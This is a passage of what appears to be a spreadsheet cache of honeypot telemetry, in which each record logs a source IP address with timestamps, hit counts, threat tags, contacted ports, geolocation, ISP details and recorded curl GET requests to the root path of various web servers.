    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:a86f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3456"/>
    <x v="3456"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T00:48:26"/>
    <d v="2025-04-03T00:48:26"/>
    <d v="2025-04-03T00:48:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Yeonggwang-gun"/>
    <s v="Yeonggwang-gun (Yeonggwang-eup)"/>
    <s v="1832500"/>
    <s v="NA"/>
    <s v="35.2948"/>
    <s v="126.506"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7628:7247"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3457"/>
    <x v="3457"/>
    <s v="NA&amp;&amp;125-228-104-109.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T00:39:09"/>
    <d v="2024-12-16T14:29:59"/>
    <d v="2025-04-03T00:39:09"/>
    <n v="334"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="23&amp;&amp;56786"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de4:686d"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3458"/>
    <x v="3458"/>
    <s v="220-135-152-48.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T00:37:39"/>
    <d v="2023-11-26T13:54:49"/>
    <d v="2025-04-03T00:37:39"/>
    <n v="980"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3135&amp;&amp;80&amp;&amp;23&amp;&amp;42307&amp;&amp;61511&amp;&amp;42313&amp;&amp;9100&amp;&amp;NA&amp;&amp;15635&amp;&amp;54732&amp;&amp;58345&amp;&amp;29172"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc87:9830"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3459"/>
    <x v="3459"/>
    <s v="114-35-175-90.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T00:28:39"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T00:28:39"/>
    <n v="373"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;NA&amp;&amp;53&amp;&amp;35220&amp;&amp;23&amp;&amp;19292&amp;&amp;9100&amp;&amp;45377"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:af5a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3460"/>
    <x v="3460"/>
    <s v="122-117-92-251.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T00:28:18"/>
    <d v="2023-07-24T18:22:05"/>
    <d v="2025-04-03T00:28:18"/>
    <n v="2128"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_HTTP_H1&amp;&amp;SMA-LAB_NTP_H26&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;41048&amp;&amp;23&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7a75:5cfb"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3461"/>
    <x v="3461"/>
    <s v="114-33-112-54.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T00:13:09"/>
    <d v="2023-11-30T01:34:48"/>
    <d v="2025-04-03T00:13:09"/>
    <n v="1853"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_IPP_H38&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;9100&amp;&amp;443&amp;&amp;80&amp;&amp;5900&amp;&amp;1080&amp;&amp;22&amp;&amp;445&amp;&amp;631&amp;&amp;58414&amp;&amp;23"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7221:7036"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3462"/>
    <x v="3462"/>
    <s v="122-116-254-191.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T00:07:41"/>
    <d v="2023-07-26T17:22:34"/>
    <d v="2025-04-03T00:07:41"/>
    <n v="2915"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;53&amp;&amp;123&amp;&amp;445&amp;&amp;389&amp;&amp;80&amp;&amp;5900&amp;&amp;22&amp;&amp;670&amp;&amp;41696&amp;&amp;41632&amp;&amp;23&amp;&amp;9100&amp;&amp;60591"/>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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:febf"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3463"/>
    <x v="3463"/>
    <s v="220-135-10-241.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T00:07:24"/>
    <d v="2024-05-06T13:04:00"/>
    <d v="2025-04-03T00:07:24"/>
    <n v="536"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;38868&amp;&amp;23&amp;&amp;NA&amp;&amp;53515&amp;&amp;9100&amp;&amp;38201&amp;&amp;80"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc87:af1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3464"/>
    <x v="3464"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T23:53:03"/>
    <d v="2025-03-07T15:02:02"/>
    <d v="2025-04-02T23:53:03"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:ac49"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3465"/>
    <x v="3465"/>
    <s v="125-228-163-111.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T23:51:22"/>
    <d v="2023-12-01T06:30:00"/>
    <d v="2025-04-02T23:51:22"/>
    <n v="659"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45"/>
